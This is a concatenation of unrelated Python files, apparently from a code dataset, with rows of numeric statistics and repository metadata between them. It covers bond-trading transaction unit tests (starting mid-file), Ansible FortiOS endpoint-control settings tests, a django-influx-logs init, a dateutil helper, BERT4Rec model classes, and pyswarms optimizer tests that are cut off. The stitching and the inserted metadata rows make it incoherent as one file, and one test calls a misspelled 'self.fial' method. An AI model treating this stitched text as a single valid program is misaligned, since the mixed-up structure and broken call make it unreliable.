transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
self.fail("QuoteId is not in store")
except InvalidTransactionError:
pass
def test_quote_id_not_a_quote(self):
transaction = BondTransaction(
{'UpdateType': 'UpdateOrder',
'Updates': [
{'UpdateType': 'UpdateOrder',
'ObjectId': self.order_id,
'QuoteId': self.order_id,
'Status': 'Matched'}]})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
self.fail("QuoteId is not a quote")
except InvalidTransactionError:
pass
def test_quote_not_open(self):
quote = self.store[self.quote_id]
quote["status"] = "Closed"
self.store[self.quote_id] = quote
transaction = BondTransaction(
{'UpdateType': 'UpdateOrder',
'Updates': [{'UpdateType': 'UpdateOrder',
'ObjectId': self.order_id,
'QuoteId': self.quote_id,
'Status': 'Matched'}]})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
self.fail("Quote has been closed")
except InvalidTransactionError:
pass
def test_incorrect_quantity_buy(self):
transaction = BondTransaction({})
organization = self.store.lookup("organization:name", "TestOrg")
quote = CreateQuoteUpdate('CreateQuote', ask_price='101',
ask_qty=10000, bid_price='101',
bid_qty=10000, firm='TEST',
isin='US912828R770')
transaction._updates = [quote]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
quote_id = quote._object_id
transaction = BondTransaction(
{'UpdateType': 'UpdateOrder',
'Updates': [
{'UpdateType': 'UpdateOrder',
'ObjectId': self.order_id,
'QuoteId': quote_id,
'Status': 'Matched'}]})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
self.fail("Quote Should not have enough quantity")
except InvalidTransactionError:
pass
def test_incorrect_quantity_sell(self):
transaction = BondTransaction({})
organization = self.store.lookup("organization:name", "TestOrg")
order = CreateOrderUpdate('CreateOrder', action='Sell',
quantity=1000000, order_type='Market',
isin='US912828R770',
firm_id=organization["object-id"])
quote = CreateQuoteUpdate('CreateQuote', ask_price='95-15+',
ask_qty=100000, bid_price='85-78',
bid_qty=100000, firm='TEST',
isin='US912828R770')
transaction._updates = [order, quote]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
order_id = order._object_id
quote_id = quote._object_id
transaction = BondTransaction(
{'UpdateType': 'UpdateOrder',
'Updates': [
{'UpdateType': 'UpdateOrder',
'ObjectId': order_id,
'QuoteId': quote_id,
'Status': 'Matched'}]})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
self.fail("Quote Should not have enough quantity")
except InvalidTransactionError:
pass
def test_close_quote(self):
transaction = BondTransaction({})
organization = self.store.lookup("organization:name", "TestOrg")
order = CreateOrderUpdate('CreateOrder', action='Sell',
quantity=100000, order_type='Market',
isin='US912828R770',
firm_id=organization["object-id"])
quote = CreateQuoteUpdate('CreateQuote', ask_price='95-15+',
ask_qty=100000, bid_price='85-78',
bid_qty=100000, firm='TEST',
isin='US912828R770')
transaction._updates = [order, quote]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
order_id = order._object_id
quote_id = quote._object_id
transaction = BondTransaction(
{'UpdateType': 'UpdateOrder',
'Updates': [
{'UpdateType': 'UpdateOrder',
'ObjectId': order_id,
'QuoteId': quote_id,
'Status': 'Matched'}]})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fial("This should be valid")
self.assertEqual(self.store[quote_id]["status"], "Closed")
class TestUpdateOrderUpdate(unittest.TestCase):
def setUp(self):
self.key = signed_object.generate_signing_key()
self.store = ObjectStore()
transaction = BondTransaction({})
participant = CreateParticipantUpdate('CreateParticipant', 'TestName')
transaction._updates = [participant]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
auth = {'ParticipantId': participant._object_id,
'Role': 'marketmaker'}
organization = CreateOrganizationUpdate('CreateOrganization',
'TestOrg', ticker='T',
pricing_source='TEST',
authorization=[auth])
self.firm_id = organization._object_id
transaction._updates = [organization]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
transaction = BondTransaction({
'Updates': [{
'UpdateType': 'Clock',
'Blocknum': 0,
'PreviousBlockId': 0,
'Timestamp': time.time()
}]
})
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
bond = CreateBondUpdate('CreateBond', issuer='T',
amount_outstanding=42671000000,
isin='US912828R770',
cusip='912828R77', corporate_debt_ratings=[],
coupon_benchmark=None, coupon_rate=.15,
coupon_type='Fixed',
coupon_frequency='Quarterly',
maturity_date='10/20/2015',
first_coupon_date='04/01/2012',
face_value=10000)
transaction._updates = [bond]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
order = CreateOrderUpdate('CreateOrder', action='Buy',
quantity=1000000, order_type='Market',
isin='US912828R770',
firm_id=organization._object_id)
transaction._updates = [order]
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
self.order_id = order._object_id
def test_valid_order_delete(self):
self.assertEquals(len(self.store["open-orders"]["order-list"]), 1)
self.assertEqual(self.store[self.order_id]["status"], "Open")
transaction = BondTransaction(
{'UpdateType': 'DeleteOrder',
'Updates': [{'UpdateType': 'DeleteOrder',
'ObjectId': self.order_id}]})
try:
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("Correct DeleteOrder transaction")
self.assertEquals(self.store["open-orders"]["order-list"], [])
| 40.040701 | 80 | 0.540543 | 5,053 | 63,945 | 6.690679 | 0.061746 | 0.062559 | 0.039754 | 0.053952 | 0.905703 | 0.885915 | 0.863583 | 0.84764 | 0.835276 | 0.81954 | 0 | 0.012358 | 0.352099 | 63,945 | 1,596 | 81 | 40.065789 | 0.803669 | 0.013465 | 0 | 0.861972 | 0 | 0 | 0.192959 | 0.012131 | 0 | 0 | 0 | 0 | 0.010563 | 1 | 0.044366 | false | 0.029577 | 0.007746 | 0 | 0.058451 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a8289860d8432c65e9912afa642b7250e8d7b453 | 10,922 | py | Python | v6.0.5/endpoint_control/test_fortios_endpoint_control_settings.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
] | 14 | 2018-09-25T20:35:25.000Z | 2021-07-14T04:30:54.000Z | v6.0.6/endpoint_control/test_fortios_endpoint_control_settings.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
] | 32 | 2018-10-09T04:13:42.000Z | 2020-05-11T07:20:28.000Z | v6.0.6/endpoint_control/test_fortios_endpoint_control_settings.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
] | 11 | 2018-10-09T00:14:53.000Z | 2021-11-03T10:54:09.000Z | # Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_endpoint_control_settings
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_endpoint_control_settings.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_endpoint_control_settings_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_endpoint_control_settings_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_endpoint_control_settings_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_endpoint_control_settings_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'endpoint_control_settings': {
'random_attribute_not_valid': 'tag',
'download_custom_link': 'test_value_3',
'download_location': 'fortiguard',
'forticlient_avdb_update_interval': '5',
'forticlient_dereg_unsupported_client': 'enable',
'forticlient_ems_rest_api_call_timeout': '7',
'forticlient_keepalive_interval': '8',
'forticlient_offline_grace': 'enable',
'forticlient_offline_grace_interval': '10',
'forticlient_reg_key': 'test_value_11',
'forticlient_reg_key_enforce': 'enable',
'forticlient_reg_timeout': '13',
'forticlient_sys_update_interval': '14',
'forticlient_user_avatar': 'enable',
'forticlient_warning_interval': '16'
},
'vdom': 'root'}
is_error, changed, response = fortios_endpoint_control_settings.fortios_endpoint_control(input_data, fos_instance)
expected_data = {
'download-custom-link': 'test_value_3',
'download-location': 'fortiguard',
'forticlient-avdb-update-interval': '5',
'forticlient-dereg-unsupported-client': 'enable',
'forticlient-ems-rest-api-call-timeout': '7',
'forticlient-keepalive-interval': '8',
'forticlient-offline-grace': 'enable',
'forticlient-offline-grace-interval': '10',
'forticlient-reg-key': 'test_value_11',
'forticlient-reg-key-enforce': 'enable',
'forticlient-reg-timeout': '13',
'forticlient-sys-update-interval': '14',
'forticlient-user-avatar': 'enable',
'forticlient-warning-interval': '16'
}
set_method_mock.assert_called_with('endpoint-control', 'settings', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| 42.664063 | 133 | 0.676616 | 1,191 | 10,922 | 5.899244 | 0.160369 | 0.077427 | 0.058924 | 0.032024 | 0.851978 | 0.837746 | 0.813407 | 0.813407 | 0.813407 | 0.813407 | 0 | 0.01624 | 0.199414 | 10,922 | 255 | 134 | 42.831373 | 0.787283 | 0.060795 | 0 | 0.834146 | 0 | 0 | 0.475493 | 0.324741 | 0 | 0 | 0 | 0 | 0.117073 | 1 | 0.02439 | false | 0 | 0.039024 | 0 | 0.068293 | 0.004878 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b570ed614d69f83f287d09ab2c758cd20db14e3c | 163 | py | Python | influx_logs/__init__.py | lazybird/django-influx-logs | 78c837c3b635cb5ca45354217ed026cdc48eedb4 | [
"MIT"
] | null | null | null | influx_logs/__init__.py | lazybird/django-influx-logs | 78c837c3b635cb5ca45354217ed026cdc48eedb4 | [
"MIT"
] | null | null | null | influx_logs/__init__.py | lazybird/django-influx-logs | 78c837c3b635cb5ca45354217ed026cdc48eedb4 | [
"MIT"
] | null | null | null | """django-influx-logs: put your application logs into InfluxDB."""
__version__ = '0.0.5'
__doc__ = 'Django Influx Logs: put your application logs into InfluxDB.'
| 32.6 | 72 | 0.742331 | 23 | 163 | 4.913043 | 0.521739 | 0.212389 | 0.283186 | 0.336283 | 0.884956 | 0.884956 | 0.884956 | 0.884956 | 0.884956 | 0 | 0 | 0.021277 | 0.134969 | 163 | 4 | 73 | 40.75 | 0.780142 | 0.368098 | 0 | 0 | 0 | 0 | 0.670103 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
b57e81ec79f8200ec767a20e7114a1b0a8ff4967 | 144 | py | Python | Part_3_advanced/m05_timezone/timezone_utcnow/homework_6_solution/new_movies/datetime_utils.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | Part_3_advanced/m05_timezone/timezone_utcnow/homework_6_solution/new_movies/datetime_utils.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | Part_3_advanced/m05_timezone/timezone_utcnow/homework_6_solution/new_movies/datetime_utils.py | Mikma03/InfoShareacademy_Python_Courses | 3df1008c8c92831bebf1625f960f25b39d6987e6 | [
"MIT"
] | null | null | null | from dateutil.relativedelta import relativedelta
def full_years_between_dates(later, earlier):
return relativedelta(later, earlier).years
| 24 | 48 | 0.826389 | 17 | 144 | 6.823529 | 0.705882 | 0.206897 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 144 | 5 | 49 | 28.8 | 0.90625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
b5a70ed0f7df4ec69a48a476a2f9f55b9bd2d1a5 | 10,134 | py | Python | model/bert.py | TobiasKoopmann/cobert | 279fc6ce938a81afa2b8f14e4cb20b13f842ff48 | [
"Apache-2.0"
] | null | null | null | model/bert.py | TobiasKoopmann/cobert | 279fc6ce938a81afa2b8f14e4cb20b13f842ff48 | [
"Apache-2.0"
] | null | null | null | model/bert.py | TobiasKoopmann/cobert | 279fc6ce938a81afa2b8f14e4cb20b13f842ff48 | [
"Apache-2.0"
] | null | null | null | from torch import nn as nn
from model.embedding import *
from model.attention.transformer import TransformerBlock, NovaTransformerBlock
from model.utils import fix_random_seed_as
class Bert4RecOG(nn.Module):
def __init__(self,
vocab_size: int,
max_len: int = 200,
n_layers: int = 2,
n_heads: int = 4,
hidden_size: int = 256,
p_dropout: float = 0.1,
seed: int = 123):
super().__init__()
fix_random_seed_as(seed)
# self.init_weights()
self.max_len = max_len
self.n_layers = n_layers
self.n_heads = n_heads
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.p_dropout = p_dropout
self.embedding = BertEmbeddingAE(vocab_size=self.vocab_size,
embed_size=self.hidden_size,
max_len=self.max_len,
dropout=self.p_dropout)
self.transformer_blocks = nn.ModuleList(
[TransformerBlock(hidden_size=self.hidden_size,
n_heads=self.n_heads,
intermediate_size=self.hidden_size * 4,
p_dropout=self.p_dropout)
for _ in range(n_layers)]
)
self.projection = nn.Linear(self.hidden_size, self.hidden_size)
self.projection_activation = nn.GELU()
self.projection_norm = nn.LayerNorm(self.hidden_size)
self.out_bias = nn.Parameter(torch.zeros(self.vocab_size))
def forward(self, batch):
x = self.embedding(batch["author_ids"], batch["position_ids"])
for transformer in self.transformer_blocks:
x = transformer.forward(x, batch["attention_mask"])
x = self.projection(x)
x = self.projection_activation(x)
x = self.projection_norm(x)
# weight tying...
x = x @ self.embedding.token.weight.T + self.out_bias
return x
class Bert4RecAE(nn.Module):
def __init__(self,
vocab_size: int,
max_len: int = 200,
n_layers: int = 2,
n_heads: int = 4,
hidden_size: int = 256,
p_dropout: float = 0.1,
seed: int = 123):
super().__init__()
fix_random_seed_as(seed)
# self.init_weights()
self.max_len = max_len
self.n_layers = n_layers
self.n_heads = n_heads
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.p_dropout = p_dropout
self.embedding = BertEmbeddingAE(vocab_size=self.vocab_size,
embed_size=self.hidden_size,
max_len=self.max_len,
dropout=self.p_dropout)
self.transformer_blocks = nn.ModuleList(
[TransformerBlock(hidden_size=self.hidden_size,
n_heads=self.n_heads,
intermediate_size=self.hidden_size * 4,
p_dropout=self.p_dropout)
for _ in range(n_layers)]
)
self.out = nn.Linear(self.hidden_size, self.vocab_size)
def forward(self, batch):
x = self.embedding(batch["author_ids"], batch["position_ids"])
for transformer in self.transformer_blocks:
x = transformer.forward(x, batch["attention_mask"])
return self.out(x)
class Bert4RecAEW(Bert4RecAE):
def __init__(self,
vocab_size: int,
max_len: int = 200,
n_layers: int = 2,
n_heads: int = 4,
hidden_size: int = 256,
p_dropout: float = 0.1,
seed: int = 123):
super().__init__(vocab_size, max_len, n_layers, n_heads, hidden_size, p_dropout, seed)
self.embedding = BertEmbeddingAEW(vocab_size=self.vocab_size,
embed_size=self.hidden_size,
max_len=self.max_len,
dropout=self.p_dropout)
class Bert4RecAEPE(nn.Module):
def __init__(self,
vocab_size: int,
n_papers: int,
max_len: int = 200,
n_layers: int = 2,
n_heads: int = 4,
hidden_size: int = 256,
p_dropout: float = 0.1,
seed: int = 123):
super().__init__()
fix_random_seed_as(seed)
self.max_len = max_len
self.n_layers = n_layers
self.n_heads = n_heads
self.vocab_size = vocab_size
self.n_papers = n_papers
self.hidden_size = hidden_size
self.p_dropout = p_dropout
self.embedding = BertEmbeddingAEPE(vocab_size=self.vocab_size,
n_papers=self.n_papers,
embed_size=self.hidden_size,
max_len=self.max_len,
dropout=self.p_dropout)
self.transformer_blocks = nn.ModuleList(
[TransformerBlock(hidden_size=self.hidden_size,
n_heads=self.n_heads,
intermediate_size=self.hidden_size * 4,
p_dropout=self.p_dropout)
for _ in range(n_layers)]
)
self.out = nn.Linear(self.hidden_size, self.vocab_size)
def forward(self, batch):
x = self.embedding(batch["author_ids"], batch["position_ids"], batch["paper_ids"])
for transformer in self.transformer_blocks:
x = transformer.forward(x, batch["attention_mask"])
return self.out(x)
class Bert4RecAEPEW(Bert4RecAEPE):
def __init__(self,
vocab_size: int,
n_papers,
max_len: int = 200,
n_layers: int = 2,
n_heads: int = 4,
hidden_size: int = 256,
p_dropout: float = 0.1,
seed: int = 123):
super().__init__(vocab_size, n_papers, max_len, n_layers, n_heads, hidden_size, p_dropout, seed)
self.embedding = BertEmbeddingAEPEW(vocab_size=self.vocab_size,
n_papers=self.n_papers,
embed_size=self.hidden_size,
max_len=self.max_len,
dropout=self.p_dropout)
class Bert4RecAEPESeq(nn.Module):
def __init__(self,
vocab_size: int,
n_papers: int,
max_len: int = 200,
n_layers: int = 2,
n_heads: int = 4,
hidden_size: int = 256,
p_dropout: float = 0.1,
seed: int = 123):
super().__init__()
fix_random_seed_as(seed)
self.max_len = max_len
self.n_layers = n_layers
self.n_papers = n_papers
self.n_heads = n_heads
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.p_dropout = p_dropout
self.embedding = BertEmbeddingAEPESeq(vocab_size=self.vocab_size,
n_papers=self.n_papers,
embed_size=self.hidden_size,
max_len=self.max_len,
dropout=self.p_dropout)
self.transformer_blocks = nn.ModuleList(
[TransformerBlock(hidden_size=self.hidden_size,
n_heads=self.n_heads,
intermediate_size=self.hidden_size * 4,
p_dropout=self.p_dropout)
for _ in range(n_layers)]
)
self.out = nn.Linear(self.hidden_size, self.vocab_size)
def forward(self, batch):
x = self.embedding(batch["author_ids"], batch["position_ids"], batch["segment_ids"], batch["paper_ids"])
for transformer in self.transformer_blocks:
x = transformer.forward(x, batch["attention_mask"])
return self.out(x)
class Bert4RecNova(nn.Module):
def __init__(self,
vocab_size: int,
n_papers: int,
max_len: int = 200,
n_layers: int = 2,
n_heads: int = 4,
hidden_size: int = 256,
p_dropout: float = 0.1,
seed: int = 123):
super().__init__()
fix_random_seed_as(seed)
self.max_len = max_len
self.n_layers = n_layers
self.n_papers = n_papers
self.n_heads = n_heads
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.p_dropout = p_dropout
self.embedding = BertEmbeddingNova(vocab_size=self.vocab_size,
n_papers=self.n_papers,
embed_size=self.hidden_size,
max_len=self.max_len,
dropout=self.p_dropout)
self.transformer_blocks = nn.ModuleList(
[NovaTransformerBlock(hidden_size=self.hidden_size,
n_heads=self.n_heads,
intermediate_size=self.hidden_size * 4,
p_dropout=self.p_dropout)
for _ in range(n_layers)]
)
self.out = nn.Linear(self.hidden_size, self.vocab_size)
def forward(self, batch):
x, meta = self.embedding(batch["author_ids"], batch["position_ids"], batch["paper_ids"])
for transformer in self.transformer_blocks:
x = transformer.forward(x, meta, batch["attention_mask"])
return self.out(x)
| 36.322581 | 112 | 0.515394 | 1,105 | 10,134 | 4.40543 | 0.078733 | 0.098603 | 0.083402 | 0.081348 | 0.870789 | 0.868735 | 0.860518 | 0.853944 | 0.847781 | 0.847781 | 0 | 0.01735 | 0.402802 | 10,134 | 278 | 113 | 36.453237 | 0.787013 | 0.005427 | 0 | 0.827273 | 0 | 0 | 0.021638 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054545 | false | 0 | 0.018182 | 0 | 0.127273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a980044bd34fab54226afb2ff16b51d194b1d3ae | 7,720 | py | Python | tests/optimizers/test_objective_func_with_kwargs.py | jole6826/pyswarms | d8bf200ea57cf013e158160d91423513c220e478 | [
"MIT"
] | 1 | 2019-03-07T06:41:43.000Z | 2019-03-07T06:41:43.000Z | tests/optimizers/test_objective_func_with_kwargs.py | jole6826/pyswarms | d8bf200ea57cf013e158160d91423513c220e478 | [
"MIT"
] | null | null | null | tests/optimizers/test_objective_func_with_kwargs.py | jole6826/pyswarms | d8bf200ea57cf013e158160d91423513c220e478 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Import modules
import pytest
import numpy as np
# Import from package
from pyswarms.single import GlobalBestPSO, LocalBestPSO
from pyswarms.utils.functions.single_obj import rosenbrock_func
def rosenbrock_with_args(x, a, b):
f = (a - x[:, 0]) ** 2 + b * (x[:, 1] - x[:, 0] ** 2) ** 2
return f
@pytest.mark.parametrize('func', [
rosenbrock_with_args
])
def test_global_kwargs(func):
"""Tests if kwargs are passed properly to the objective function for when kwargs are present"""
# setup optimizer
options = {'c1': 0.5, 'c2': 0.3, 'w': 0.9, 'k': 2, 'p': 2}
x_max = 10 * np.ones(2)
x_min = -1 * x_max
bounds = (x_min, x_max)
opt_ps = GlobalBestPSO(n_particles=100, dimensions=2, options=options, bounds=bounds)
# run it
cost, pos = opt_ps.optimize(func, 1000, print_step=10, verbose=3, a=1 , b=100)
assert np.isclose(cost, 0, rtol=1e-03)
assert np.isclose(pos[0], 1.0, rtol=1e-03)
assert np.isclose(pos[1], 1.0, rtol=1e-03)
@pytest.mark.parametrize('func', [
rosenbrock_with_args
])
def test_global_kwargs_without_named_arguments(func):
"""Tests if kwargs are passed properly to the objective function for when kwargs are present and
other named arguments are not passed, such as print_step"""
# setup optimizer
options = {'c1': 0.5, 'c2': 0.3, 'w': 0.9, 'k': 2, 'p': 2}
x_max = 10 * np.ones(2)
x_min = -1 * x_max
bounds = (x_min, x_max)
opt_ps = GlobalBestPSO(n_particles=100, dimensions=2, options=options, bounds=bounds)
# run it
cost, pos = opt_ps.optimize(func, 1000, verbose=3, a=1 , b=100)
assert np.isclose(cost, 0, rtol=1e-03)
assert np.isclose(pos[0], 1.0, rtol=1e-03)
assert np.isclose(pos[1], 1.0, rtol=1e-03)
@pytest.mark.parametrize('func', [
rosenbrock_func
])
def test_global_no_kwargs(func):
"""Tests if args are passed properly to the objective function for when no args are present"""
# setup optimizer
options = {'c1': 0.5, 'c2': 0.3, 'w': 0.9, 'k': 2, 'p': 2}
x_max = 10 * np.ones(2)
x_min = -1 * x_max
bounds = (x_min, x_max)
